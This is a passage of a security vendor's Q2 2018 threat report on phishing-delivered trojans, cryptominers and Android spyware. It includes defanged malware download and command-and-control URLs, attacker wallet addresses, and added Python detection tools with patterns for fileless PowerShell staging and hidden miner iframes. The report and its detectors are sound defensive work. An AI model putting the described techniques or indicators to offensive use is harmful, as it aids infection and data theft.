Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
1. Executive summary
1.1 Overview
• In Q2, Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world.
• The malware was detected in 237 countries' top-level domains.
• Russia, Turkey and India were the countries with the highest number of worm infections.
• The United Kingdom had the highest proportion of detected backdoors.
• Ukraine and Russia were the most common countries of detection for viruses.
• Germany was the #1 country hit by trojans.
1.2 New Trends
1.2.1 Trojans jumped to the top of the malware list
The most dangerous sign is the unfolding merger of trojans and phishing emails, which amplifies the spread of the malware. Attackers use trojans to deliver other malware, and the trojan surge accompanies a significant increase in other malware infections. As such, users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity.
1.2.2 Cryptominers evolved into multifunctional malware
Cryptomining decreased in quantity but grew in harmful capabilities. As events in Q2 demonstrated, this genre of malware is actively developing in two directions: better hiding and stronger persistence. Cryptominers have gained new features that let them fight antiviruses and root deeply in users' systems.
1.2.3 Android malware skyrocketed in variety
In Q2, the Comodo Threat Research Labs observed a huge spike in Android malware development. Android devices have become attractive targets for cybercriminals because a modern mobile device represents a treasure trove of data. Spyware takes the lead among Android malware types. Like real-world spies, Android spyware constantly changes guises and methods of avoiding detection, and its harmful potential goes up with every new version.
1.2.4 Geopolitical intelligence
Cyberattacks and malware spikes are often correlated with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests and other events during Q2 2018 clearly demonstrate the existence of such correlations.
2. Trojans going on the offensive to hunt for confidential data
The second quarter of 2018 brought a sudden change in malware competition. Trojans squeezed out other malware types and jumped to the top of the charts. Gaining the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their appearance forces cybersecurity departments and individual users to update their defense tactics.
Malware Distribution by Type
Why are these changes inevitable?
Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at providing a diversity of attacks, stealing data, implanting ransomware, adware or cryptominers, or even completely crashing systems.
Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.
Hence the need for a new approach to defense tactics. Let's have a closer look at the most active and vicious players on the trojan team to understand what harm they can do to your computers if they sneak inside.
Distribution of top 30 Malware Families
In this list of the top 30 malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.
For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. And the downloaded malware can be of any type.
Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website to infect users with other types of malware.
TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".
TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.
TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It's usually spread via a phishing email.
Such diversity of malicious activity by trojans, and their special ability to hide, have always made them one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.
The accompanying graph shows the most popular malware spread via email. Note that 18 of the 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to %AppData% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, and WebDAV and SCP clients. Then it sends all the collected data to the attackers' server httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows-native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
And after that, Emotet begins its real mission – stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning, because it infects computers with popular legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.
Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as remote desktop control, file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok – steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software – Microsoft's, this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
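As an added example (not from the report), a mail-gateway triage routine in Python that parses the plain-text IQY format described above and holds any attachment whose query URL points at a host outside an allowlist; the allowlist host and the two sample files are constructed.

```python
"""Triage Excel Web Query (.iqy) attachments before Excel ever opens them."""
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hosts this organisation legitimately pulls Excel web queries from (constructed allowlist).
ALLOWED_HOSTS = {"intranet.example.com"}


@dataclass
class IqyQuery:
    url: str
    options: dict = field(default_factory=dict)


def parse_iqy(text: str) -> IqyQuery:
    """Parse the IQY text format: 'WEB', a query version line, the URL, then key=value options."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    # lines[1] is the query version (normally "1"); the next line is the URL Excel will fetch.
    url = lines[2]
    options = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            options[key.strip()] = value.strip()
    return IqyQuery(url, options)


def triage_iqy(text: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return the reasons an IQY attachment should be quarantined; an empty list means allow."""
    reasons = []
    try:
        query = parse_iqy(text)
    except ValueError as err:
        return [f"malformed IQY: {err}"]
    parsed = urlparse(query.url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"unexpected URL scheme {parsed.scheme!r}")
    if host not in allowed_hosts:
        # Excel evaluates whatever the remote host returns, so an unknown host is the core risk.
        reasons.append(f"query host {host!r} is not on the allowlist")
    elif parsed.scheme == "http":
        reasons.append("allowlisted host queried over plaintext HTTP (content could be swapped in transit)")
    return reasons


# Constructed samples: a lure-style query to an unknown host, and a legitimate intranet query.
SAMPLE_LURE = "WEB\n1\nhttp://example.invalid/1.dat\n\nSelection=AllTables\nFormatting=None\n"
SAMPLE_OK = "WEB\n1\nhttps://intranet.example.com/report.html\nSelection=AllTables\n"

if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_LURE), ("ok", SAMPLE_OK)):
        print(name, triage_iqy(sample) or "allow")
```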
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. The merging of trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
[Chart data (growth of Flawed Ammyy attacks for Q2): Apr 43188, May 46382, Jun 48881]
3. Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
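The decoding step mentioned above, as an added example in Python that is not the report's own tooling: it pulls the -EncodedCommand argument out of a scheduled-task command line, decodes it (base64 over UTF-16LE, which is what PowerShell expects) and flags the registry-read and in-memory-staging patterns that characterise BadShell. The task command line and the registry path in it are constructed.

```python
"""Decode a PowerShell -EncodedCommand from a scheduled task and flag fileless-staging patterns."""
import base64
import re

# Spellings of -EncodedCommand that powershell.exe accepts (any unambiguous prefix works).
ENC_FLAGS = {"-encodedcommand", "-encoded", "-enc", "-ec", "-e"}

# Heuristics for the BadShell pattern: payload held in the registry, decoded and run in memory.
INDICATORS = {
    "registry read": re.compile(r"Get-ItemProperty\b.*\bHK(?:LM|CU):", re.I),
    "base64 decode": re.compile(r"FromBase64String", re.I),
    "dynamic execution": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def extract_encoded_command(cmdline: str):
    """Return the base64 argument following an -EncodedCommand style flag, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """PowerShell encodes the script as UTF-16LE before base64; reverse that."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage_task_command(cmdline: str) -> dict:
    """Decode the task's PowerShell payload (if encoded) and list matching indicators."""
    b64 = extract_encoded_command(cmdline)
    script = decode_encoded_command(b64) if b64 else None
    # Hidden-window is an outer command-line switch; the rest are checked in the decoded script.
    haystack = cmdline + "\n" + (script or "")
    flags = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"encoded": b64 is not None, "script": script, "flags": flags}


def encode_for_powershell(script: str) -> str:
    """Helper used only to build the constructed sample below (same transform PowerShell uses)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a task action that reads a blob from a (made-up) registry value and
# base64-decodes it in memory, the staging pattern the BadShell analysis describes.
SAMPLE_SCRIPT = (
    "$blob = (Get-ItemProperty -Path 'HKCU:\\Software\\ExampleVendor').Payload; "
    "$bytes = [System.Convert]::FromBase64String($blob)"
)
SAMPLE_TASK_CMD = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_for_powershell(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    result = triage_task_command(SAMPLE_TASK_CMD)
    print("decoded:", result["script"])
    print("flags:", result["flags"])
```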
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature – it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task – mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.
CoinMiner kills its rivals as follows:
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way, CoinMiner occupies the victim's computer exclusively, using its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
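A defender-side check for the trick just described, added here as an example that is not part of the report: it walks a page's HTML, decodes any long base64 runs it finds (base64 is an assumption; the report only says the string is decoded), and flags iframes that are 1 pixel wide and high and whose source is a URL shortener such as cnhv.co. The sample page is constructed.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Shortener hosts worth flagging; cnhv.co is the one the report shows.
SHORTENER_HOSTS = {"cnhv.co"}

# Constructed sample page (not taken from the report): a base64 string written
# into the DOM by document.write/atob, decoding to a 1x1 iframe.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/placeholder" width="1" height="1"></iframe>'
SAMPLE_HTML = (
    "<html><body><p>Welcome to the site</p>"
    '<script>document.write(atob("'
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
    + '"));</script></body></html>'
)

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([A-Za-z-]+)\s*=\s*["']?([^"'\s>]+)""")


def decode_base64_runs(text):
    """Return the text of every base64 run in `text` that decodes cleanly."""
    decoded = []
    for match in BASE64_RUN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded.append(raw.decode("utf-8", errors="ignore"))
    return decoded


def _pixels(value):
    """Parse a width/height attribute such as '1' or '1px'; None if not numeric."""
    digits = value.lower().rstrip("px")
    return int(digits) if digits.isdigit() else None


def iframes_in(text, encoded):
    """Yield one record per <iframe> in `text` with its host and pixel size."""
    for tag in IFRAME_TAG.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(1))}
        src = attrs.get("src", "")
        yield {
            "src": src,
            "host": (urlparse(src).hostname or "").lower(),
            "width": _pixels(attrs.get("width", "")),
            "height": _pixels(attrs.get("height", "")),
            "encoded": encoded,
        }


def suspicious_iframes(html, shortener_hosts=SHORTENER_HOSTS):
    """Flag iframes that are both (near-)invisible and point at a known shortener.

    Iframes in the raw HTML are checked first, then iframes that only appear
    after decoding base64 runs, which is how the report's sample hid CoinHive.
    """
    findings = []
    candidates = list(iframes_in(html, encoded=False))
    for layer in decode_base64_runs(html):
        candidates.extend(iframes_in(layer, encoded=True))
    for f in candidates:
        tiny = (f["width"] is not None and f["width"] <= 1
                and f["height"] is not None and f["height"] <= 1)
        if tiny and f["host"] in shortener_hosts:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_HTML):
        print("hidden shortener iframe:", finding)
```

A real deployment would also follow the shortener redirect and match the final host against the miner's known domains; this block stops at the shortener so it runs offline.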
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
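A paste guard that catches the substitution described above, added here as an example and not code from the report or from the malware: it records the address the user deliberately copied and, before the paste is acted on, compares it with what the clipboard now holds; a second function applies the same idea to polled clipboard snapshots. The simulated clipboard and the event sequence are constructed; the two addresses are the ones quoted above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Bitcoin address shapes: legacy Base58 (starts with 1 or 3) and bech32 (bc1...).
# The check is syntactic only; it does not validate the checksum.
LEGACY_BTC = re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$")
BECH32_BTC = re.compile(r"^bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38,59}$")


def looks_like_wallet_address(text: str) -> bool:
    """True if the clipboard text has the shape of a Bitcoin address."""
    candidate = text.strip()
    return bool(LEGACY_BTC.match(candidate) or BECH32_BTC.match(candidate))


@dataclass
class ClipboardGuard:
    """Remembers what the user copied and warns if the clipboard changed underneath."""
    copied: Optional[str] = None
    alerts: List[dict] = field(default_factory=list)

    def on_user_copy(self, text: str) -> None:
        # Called when the user deliberately copies something (Ctrl+C).
        self.copied = text.strip()

    def check_before_paste(self, clipboard_now: str) -> Optional[dict]:
        """Compare the clipboard with the last deliberate copy; return an alert or None."""
        current = clipboard_now.strip()
        if self.copied is None or current == self.copied:
            return None
        if looks_like_wallet_address(self.copied) and looks_like_wallet_address(current):
            alert = {"copied": self.copied, "clipboard": current,
                     "reason": "wallet address replaced since it was copied"}
            self.alerts.append(alert)
            return alert
        return None


def scan_clipboard_history(snapshots: List[Tuple[float, str]], max_gap_seconds: float = 2.0):
    """Flag address-to-different-address changes within `max_gap_seconds`.

    `snapshots` is a list of (unix_time, clipboard_text) taken by a polling
    monitor. A person rarely copies two different wallet addresses within a
    second or two, so such a transition is worth alerting on.
    """
    hits = []
    for (t0, before), (t1, after) in zip(snapshots, snapshots[1:]):
        b, a = before.strip(), after.strip()
        if (b != a and t1 - t0 <= max_gap_seconds
                and looks_like_wallet_address(b) and looks_like_wallet_address(a)):
            hits.append({"at": t1, "from": b, "to": a})
    return hits


# Constructed replay of the attack in the report: the user copies the first
# address, a hijacker silently swaps it, then the user pastes.
COPIED_BY_USER = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SWAPPED_IN = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def replay_hijack(copied: str = COPIED_BY_USER, clipboard_at_paste: str = SWAPPED_IN):
    """Run the guard over the constructed scenario and return its verdict."""
    guard = ClipboardGuard()
    guard.on_user_copy(copied)
    return guard.check_before_paste(clipboard_at_paste)


if __name__ == "__main__":
    verdict = replay_hijack()
    print("ALERT:" if verdict else "clean", verdict)
    polled = [(0.0, "hello"), (1.0, COPIED_BY_USER), (1.5, SWAPPED_IN), (30.0, SWAPPED_IN)]
    print(scan_clipboard_history(polled))
```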
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1 Naver Defender
Version-2 Netease Defender
Version-3 PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: the contact id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control over the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
